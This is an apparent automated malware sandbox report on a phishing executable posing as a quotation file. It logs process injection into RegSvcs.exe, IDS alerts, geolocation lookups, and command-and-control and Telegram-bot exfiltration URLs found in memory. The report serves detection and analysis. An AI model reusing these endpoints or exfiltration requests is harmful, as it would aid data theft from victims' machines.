Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0663DB71h 9_2_0663D8C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066D9C38h 9_2_066D9940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066D4160h 9_2_066D3E68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066D5948h 9_2_066D5650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066D8918h 9_2_066D8620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066D7130h 9_2_066D6E38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066D2978h 9_2_066D2680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066D1190h 9_2_066D0E98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066D62D8h 9_2_066D5FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066D4AF0h 9_2_066D47F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066D7AC0h 9_2_066D77C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066D92A8h 9_2_066D8FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066D9770h 9_2_066D9478
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066D1FE8h 9_2_066D1CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066D4FB8h 9_2_066D4CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066D37D0h 9_2_066D34D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066D67A0h 9_2_066D64A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066D7F88h 9_2_066D7C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066D0800h 9_2_066D0508
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066D8DE0h 9_2_066D8AE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066D1658h 9_2_066D1360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066D2E40h 9_2_066D2B48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066D4628h 9_2_066D4330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066D75F8h 9_2_066D7300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066D5E10h 9_2_066D5B18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066D0338h 9_2_066D0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066D1B20h 9_2_066D1828
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D3308h9_2_066D3010
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D6C68h9_2_066D6970
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D8451h9_2_066D8158
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D0CC8h9_2_066D09D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D3C98h9_2_066D39A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D24B0h9_2_066D21B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066D5480h9_2_066D5188

                  Networking

                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.10:49962 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.10:49853 -> 149.154.167.220:443
                  Source: unknownDNS query: name: api.telegram.org
                  Source: Yara matchFile source: 2.2.ageless.exe.fe0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.ageless.exe.c60000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: global trafficTCP traffic: 192.168.2.10:49918 -> 208.91.199.225:587
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2014/01/2025%20/%2023:11:55%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2014/01/2025%20/%2023:22:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49772 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49871 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49889 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49754 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49901 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49766 -> 104.21.96.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49958 -> 104.21.96.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49785 -> 104.21.96.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49843 -> 104.21.96.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49808 -> 104.21.96.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49832 -> 104.21.96.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49886 -> 104.21.96.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49937 -> 104.21.96.1:443
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.10:49760 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.10:49877 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F8CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,1_2_00F8CE44
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficDNS traffic detected: DNS query: us2.smtp.mailhostbox.com
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 14 Jan 2025 15:57:32 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 14 Jan 2025 15:57:47 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: RegSvcs.exe, 00000003.00000002.2611160055.000000000296D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                  Source: ageless.exe, 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, ageless.exe, 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: ageless.exe, 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, ageless.exe, 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: ageless.exe, 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, ageless.exe, 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: RegSvcs.exe, 00000003.00000002.2611160055.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: RegSvcs.exe, 00000003.00000002.2611160055.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: ageless.exe, 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, ageless.exe, 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: RegSvcs.exe, 00000003.00000002.2611160055.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: RegSvcs.exe, 00000003.00000002.2611160055.000000000298F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002DCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                  Source: ageless.exe, 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, ageless.exe, 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: RegSvcs.exe, 00000003.00000002.2616330427.0000000003813000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2615772081.0000000003C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: RegSvcs.exe, 00000003.00000002.2611160055.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002D16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: ageless.exe, 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, ageless.exe, 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002D16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: RegSvcs.exe, 00000003.00000002.2611160055.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002D16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: RegSvcs.exe, 00000003.00000002.2611160055.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002D16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20a
                  Source: RegSvcs.exe, 00000003.00000002.2616330427.0000000003813000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2615772081.0000000003C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: RegSvcs.exe, 00000003.00000002.2616330427.0000000003813000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2615772081.0000000003C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: RegSvcs.exe, 00000003.00000002.2616330427.0000000003813000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2615772081.0000000003C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: RegSvcs.exe, 00000009.00000002.2610745756.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: RegSvcs.exe, 00000003.00000002.2611160055.00000000029AD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002DED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003C51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003C51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003C51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: RegSvcs.exe, 00000003.00000002.2611160055.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.00000000028AF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.000000000283F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002C7E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
                  Source: ageless.exe, 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.000000000283F000.00000004.00000800.00020000.00000000.sdmp, ageless.exe, 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002C7E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: RegSvcs.exe, 00000009.00000002.2610745756.0000000002C7E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                  Source: RegSvcs.exe, 00000003.00000002.2611160055.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.000000000286A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.00000000028AF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002CA9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002D16000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                  Source: RegSvcs.exe, 00000003.00000002.2616330427.0000000003813000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2615772081.0000000003C51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                  Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003C51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: RegSvcs.exe, 00000009.00000002.2610745756.0000000002E23000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002E14000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
                  Source: RegSvcs.exe, 00000003.00000002.2611160055.00000000029DE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002E1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lB
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49766
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49843
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49886
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49962
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49785
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49760
                  Source: unknown | Network traffic detected: HTTP traffic on port 49766 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49785 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49760 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49877 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49914 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49958 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49937 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49937
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49914
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49958
                  Source: unknown | Network traffic detected: HTTP traffic on port 49778 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49778
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49877
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49832
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49853
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49796
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49895
                  Source: unknown | Network traffic detected: HTTP traffic on port 49927 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49843 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49822 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49946 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49895 -> 443
